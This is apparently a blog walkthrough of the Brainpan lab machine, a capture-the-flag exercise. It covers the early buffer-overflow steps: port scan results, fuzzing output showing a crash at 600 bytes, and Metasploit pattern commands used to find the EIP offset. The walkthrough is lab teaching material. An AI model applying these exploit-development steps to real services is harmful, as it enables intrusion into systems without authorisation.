https://tryhackme.com/room/brainpan

Pwned Date - 30th September 2022

Vulnhub - Brainpan 1 Walkthrough - StefLan's Security Blog

STRAIGHT JUMP INTO THE BUFFER OVERFLOW

PORT      STATE SERVICE
9999/tcp  open  abyss
10000/tcp open  snet-sensor-mgmt

Navigating to port http://<ip>:10000/bin and we will get our brainpan.exe

Untitled

When we run the brainpan.exe we will open port 9999

┌──(kali㉿kali)-[~]
└─$ wine brainpan.exe 
[+] initializing winsock...done.
[+] server socket created.
[+] bind done on port 9999
[+] waiting for connections.

1. Fuzzing

fuzzer.py

┌──(kali㉿kali)-[~]
└─$ python 1-fuzzer.py
Fuzzing with 100 bytes
Fuzzing with 200 bytes
Fuzzing with 300 bytes
Fuzzing with 400 bytes
Fuzzing with 500 bytes
Fuzzing with 600 bytes
Fuzzing crashed at 600 bytes

Untitled

2. Finding Offset

Use msf-pattern_create +400 from the previous crashed size

msf-pattern_create -l 1000

find-offset.py

Getting our EIP 35724134

Untitled

msf-pattern_offset -l <crashed_size> -q <EIP>